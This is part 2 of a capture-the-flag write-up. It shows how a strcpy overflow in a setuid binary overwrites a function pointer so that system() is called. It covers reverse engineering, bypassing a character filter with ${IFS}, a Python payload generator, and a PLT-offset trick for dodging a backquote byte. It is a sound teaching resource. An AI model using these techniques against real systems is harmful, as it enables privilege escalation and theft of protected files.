T19 Challenge - Part 2

This is the second part of the writeup for the T19 Challenge, and here is part 1. Or just skip to part 3.

Previously, we managed to gain shell access to the server as the user rubyist, by being able to execute arbitrary commands through the web application. In this part, we will be exploiting a stack buffer overflow on a setuid binary to escalate privileges.

Recon

After submitting the first flag, the challenge tells us that we do not have access to the running server binary, but they heard that Ben is working on it. Running ls -al in the home directory also shows us a reference to Ben, as we have a symbolic link dbclient that points to /home/ben/dbclient.

rubyist@t19-deployment-7b944c57cb-h5vjr:~$ ls -al
total 44
drwxr-xr-x 1 rubyist rubyist 4096 Jan 16 11:03 .
drwxr-xr-x 1 root    root    4096 Dec 26 15:26 ..
-rw------- 1 rubyist rubyist 3058 Jan 19 00:27 .bash_history
-rw-r--r-- 1 rubyist rubyist  220 May 15  2017 .bash_logout
-rw-r--r-- 1 rubyist rubyist 3526 May 15  2017 .bashrc
-r----S--- 1 rubyist rubyist   33 Dec 17 13:24 .flag.apprentice
-rw-r--r-- 1 rubyist rubyist  675 May 15  2017 .profile
lrwxrwxrwx 1 rubyist rubyist   18 Dec 26 15:26 dbclient -> /home/ben/dbclient
-rwxrwxr-x 1 rubyist rubyist 1297 Dec 26 12:48 http.rb
-rw-rw-r-- 1 rubyist rubyist  259 Dec 18 13:23 plug.rb
drwxrwxr-x 2 rubyist rubyist 4096 Dec 20 10:56 views

Checking out /home/ben tells us that dbclient is a setuid binary. This could be possibly exploited for us to gain the same permissions as the ben user.

rubyist@t19-deployment-7b944c57cb-h5vjr:~$ ls -al /home/ben
total 60
drwxr-xr-x 1 ben  ben   4096 Jan 15 16:19 .
drwxr-xr-x 1 root root  4096 Dec 26 15:26 ..
-rw-r--r-- 1 ben  ben    220 May 15  2017 .bash_logout
-rw-r--r-- 1 ben  ben   3526 May 15  2017 .bashrc
-r----S--- 1 ben  ben     24 Nov 29 15:00 .flag.advanced
-rw-r--r-- 1 ben  ben    675 May 15  2017 .profile
-rws---r-x 1 ben  ben  14872 Dec 17 18:01 dbclient
-r-------- 1 ben  ben  14552 Jan 15 16:19 srv_copy

Once we manage to exploit this binary to get a shell, we will have a shell running as user ben. Following which, we will have access to the server binary, named as srv_copy in ben’s home directory.

Reverse Engineering

Downloading the binary

To analyse dbclient, we need to download the binary first. The most convenient way I thought of was to get a hexdump of the binary, then reverse it locally. Unfortunately, xxd and hexdump were not present on the server. But it turns out there is an od command to do the work.

od -vtx1 /home/rubyist/dbclient

To avoid having to copy such big chunks of od output, I redirected the reverse shell output into a file dbclient-dump, then removed the irrelevant lines. After which, I could easily do the following to recover the binary.

cat dbclient-dump | cut -d" " -f2- | xxd -r -g 1 -p1 > dbclient

Analysing the binary

int main(int argc, char** argv)
{
    if (argc == 1)
    {
        if (ping_server())
        {
            puts("client: server is live");
            return 0;
        }
        else
        {
            puts("client: server is bad");
            return 1;
        }
    }
    else if (argc == 3)
    {
        if (!hash_valid(argv[1], strlen(argv[1])))
        {
            puts("client bad hash");
            return 1;
        }

        char hash[40];
        unsigned long long func = 0xFFFFFFFFFFFFFFFF;

        strcpy(&hash, argv[1]);
        func &= z85_decode;     // z85_decode is a function
        // cast func to a function that takes a char* and returns a char*
        // then call it on hash
        decoded_hash = ((char* (*)(char *))func)(&hash);
        if (!decoded_hash)
        {
            puts("client hash failed");
            return 1;
        }

        int res;
        if (check_hash(decoded_hash, &res) == 1 )
        {
            if (res)
                printf("true");
            else
                printf("false");
        }
        else
        {
            puts("client server communication failed");
            return 1;
        }
    }
    else
    {
        puts("client [hash] [filename]");
        return 1;
    }

    return 0;
}

Simplified for readability

The program expects a hash and filename as program arguments, which explains the cmd "hash" "name" seen in part 1. First, the hash will be checked that it only contains the following characters.

123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-:+=^!/*?&<>()[]{}@%$#

Then, the program calls z85decode on the hash, which is reasonable since the web application performs z85encode on it. After that, it sends the decoded hash to the server to check whether it is a virus.

Communication with the server is done using sockets (not shown above).

I shall omit the exact implementation details of communicating with the server, as it is not relevant with the vulnerability and exploit for this part. It will however be discussed in part 3.

The vulnerability lies within these 5 lines of code.

char hash[40];
unsigned long long func = 0xFFFFFFFFFFFFFFFF;

strcpy(hash, argv[1]);
func &= z85_decode;     // z85_decode is a function
// cast func to a function that takes a char* and returns a char*
// then call it on hash
decoded_hash = ((char* (*)(char *))func)(&hash);

The length of argv[1] is not checked when doing strcpy onto hash. This means we can overflow hash and overwrite the content in func. Doing so, we can call almost any function we want, which will then take hash as an argument.

Exploit

Fortunately, system() is present in the binary, so we can just change func to it.

The attack plan is now simple, write our command into hash, then overwrite func such that doing func &= z85_decode turns func to the address of system(), which will result in system(our_command) being executed.

As the address of z85_decode is 0x401af6, while system is 0x400a60, we just need to find 3 valid bytes as func’s initial value. Overwriting with 0x4a4a60, in other words "hJJ", works.

Nasty filter

// 123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-:+=^!/*?&<>()[]{}@%$#
if (!hash_valid(argv[1], strlen(argv[1])))
{
    puts("client bad hash");
    return 1;
}

Before calling strcpy, the program checks if all characters in the hash are in a given set. SPACE and ; are not allowed. This means we cannot mark the end of our command like /bin/sh;ls;, nor can we indicate arguments for the command like ls -al.

As we are overflowing the buffer with strcpy, we also cannot have null bytes to mark the end of our command, if not we won’t even be able to overwrite the content of func. For example, we may set hash to be "/bin/shAAAAAAA...AAAhJJ", in order to point func to system(). But calling system() with "/bin/shAAAAAAAAA..." is going to just result in an error.

There are a few ways to bypass this. One way is to use insert semicolons, as "/bin/sh;AAAA..." will result in 2 separate commands being executed, namely "/bin/sh" and AAAA.... The second one will only be executed when the first one terminates. But we cannot do this, since semicolon is not a valid character.

Another way is to mark the rest of the string as a comment. For example, "/bin/sh #AAA..." would be fine since "AAA..." is just a comment. But spaces are not allowed… and "/bin/sh#AAA..." is not recognized as a valid command.

There is still hope. There is something called an internal field separator in the Linux shell, which can be used by writing ${IFS}. For example, "echo${IFS}hello${IFS}world" is equivalent to "echo hello world".

Awesome, how about doing "sh${IFS}#AAA..." to spawn a shell then. Um… apparently this doesn’t work. It turns out that IFS behaves as separators between command arguments, meaning that doing the above will end up calling sh with #AAA... as its argument, resulting in an error.

Nevermind, all we want to do here is just to read files off the server. Not having a shell is totally fine. In that case, we can use the same trick as earlier, by getting a hexdump of a file then converting it back. Or in the case of the flag, we can just use cat.

cat /home/ben/.flag.advanced
od -vtx1 /home/ben/srv_copy

The reason cat or od would work is because cat flag AAAA would first try to read from flag, then AAAA. As flag is successfully read, it will print the contents first, only after which it will try to read AAAA and fail. The same applies for od.

Backquote substitution?

Now, we just need to get into the server, and execute ./dbclient hash filename, where hash is our payload. To make things easy, I made a python script to generate the full command for me.

SPACE = "${IFS}"
payload = "cat" + SPACE + "/home/ben/.flag.advanced" + SPACE
payload = payload.ljust(0x30, "A")
payload += "hJJ"
payload += "BBBBBBBBB"

print("./dbclient \"" + payload.replace("$", "\\$") + "\" aa")

Now, it’s time to get flag.

$ ./dbclient "cat\${IFS}/home/ben/.flag.advanced\${IFS}AAAAAAAAAhJJBBBBBBBBB" aa
sh: 2: Syntax error: EOF in backquote substitution

Backquotes? I didn’t put in any backquotes… what’s wrong? Recall that the address of system is 0x401a60, and 0x60 translates to '`'. This means after func&=z85_decode, hash would now contain the following

cat\${IFS}/home/ben/.flag.advanced\${IFS}AAAAAAAAA`\x1a@BBBBBBBBB

This is where most people are stuck at, I believe. After trying countless ways, I still could not find a way to escape the backquote, making my payload completely useless. Until I remembered, system() is a function in the procedure linkage table (PLT), and functions in the PLT all maintain the following form.

jmp *<corresponding GOT entry>
push <num>
jmp <top of plt>
Short primer on dynamic relocation

If you are not interested, do skip ahead.

For all the above to make sense, we need to know about how an ELF binary dynamically resolve external library functions, in the case of a dynamically-linked binary, such as dbclient.

file

When a dynamically-linked program calls a function from an external library such as libc, the address to that function would not be known during compile time, since, obviously the compiler would not know where will the libraries be mapped during runtime. If the compiler does assign an address, this would break functionality across different versions of the library as the address to a certain function may be different.

On the other hand, a statically-linked binary would have those addresses constant as the compiler copies all the instructions of called functions and embeds them into the binary itself. This allows for a user to not need the required libraries on their system, but this would cause the binary to be very large in size, scaling according to the number of external functions referenced.

Knowing the difference, we can now ask, “how does the program know the addresses of these functions?”. Firstly, the PLT will contain a list of functions that are referenced in the program, and every function looks like the following (except the first one).

jmp *<corresponding GOT entry>
push <num>
jmp <top of plt>

plt

This works by using the global offset table(GOT), which contains a list of addresses to functions from external libraries during runtime. Each function in the PLT would have a corresponding entry in the GOT, which will allow it to jump to the actual function in the external library when being called. Hence, jmp *<corresponding GOT entry>.

At the start, each global offset table(GOT) entry would contain the address of one instruction after the PLT entry, i.e. address to push <num>. So, when calling a function for the first time, it will execute

push <num>
jmp <top of plt>

As you can see, the top of the PLT (free@plt-0x10 in the screenshot above) doesn’t have a name. It is actually dl_runtime_resolve, which as its name suggests, resolves the addresses for a function during runtime. push <num> is used to tell dl_runtime_resolve the index in the symbol table to look at, so that it can know which function to resolve.

Here is an example of the GOT. The addresses in green are the ones that have already been resolved, while the yellow ones aren’t.

got

Completing the exploit

Summarizing the above, instead of having func pointing to jmp <system_got_entry>, the same can be achieved by pointing it to push 8.

0000000000400a60 <__libc_system@plt>:
  400a60:  ff 25 f2 25 20 00        jmpq   *<system_got_entry>  
  400a66:  68 08 00 00 00           pushq  $0x8
  400a6b:  e9 60 ff ff ff           jmpq   4009d0 <dl_runtime_resolve>

With this in place, we just need to go 1 instruction forward, to consider our system() to be at 0x400a66 instead of 0x400a60. Now there will be no more backquotes.

You can find the relevant files here.


In part 3, we create a custom client to attack the virus database service and empty the database.

Offtopic: Understanding how dynamic relocation works is the first part of learning the ret2dlresolve technique. For more information, you could look into section 5 of this phrack article, or 二栈溢出漏洞利用-ret2resolve.

If there is anything unclear, feel free to leave a comment below.